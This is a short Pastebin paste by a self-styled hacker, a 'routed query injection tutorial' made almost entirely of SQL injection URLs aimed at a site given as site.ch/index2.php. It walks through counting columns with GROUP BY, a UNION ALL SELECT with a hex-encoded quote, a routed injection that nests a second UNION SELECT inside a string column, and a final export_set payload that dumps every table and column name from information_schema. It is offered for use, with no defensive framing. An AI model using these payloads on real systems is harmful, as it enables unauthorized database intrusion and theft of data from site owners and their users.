Advertisement
zurael_sTz

Routed query injection tutorial |zuraelsTz|

Feb 23rd, 2017
329
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.49 KB | None | 0 0
  1. <===============Hacker zurael sTz===============>
  2. =================twitter=============================
  3. https://twitter.com/zurael_stz
  4. =================facebook============================
  5. https://www.facebook.com/sTzisrael/
  6. =====================================================
  7. =================telegram============================
  8. https://telegram.me/joinchat/BL8GnT_yQscC-6gBMuCW_w
  9. =====================================================
  10. <===============Hacker zurael sTz===============>
  11.  
  12. Routed query injection tutorial
  13. https://youtu.be/hlpBpopqnXs
  14.  
  15.  
  16. http://site.ch/index2.php?rub=11
  17.  
  18. group by
  19.  
  20. http://site.ch/index2.php?rub=11 group by 13;%00-- : New errer
  21. http://site.ch/index2.php?rub=11 group by 14;%00-- : errer
  22.  
  23.  
  24. http://site.ch/index2.php?rub=.11 +UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,0x313127,12,13,14;%00
  25.  
  26. hex
  27. 0x313127 = 11'
  28.  
  29. http://site.ch/index2.php?rub=.11 +UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,"11 order by 20--",12,13,14;%00 : Unknown column '20' in 'order clause'
  30.  
  31. union select
  32.  
  33. http://site.ch/index2.php?rub=.11 +UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,"11 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--",12,13,14;%00
  34.  
  35. column : 3
  36.  
  37. http://site.ch/index2.php?rub=.11+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,"-11+UNION+ALL+SELECT+1,2,(Select+export_set(5,@:=0,(select+count(*)
  38. from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,
  39. 18,19",12,13,14;00
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement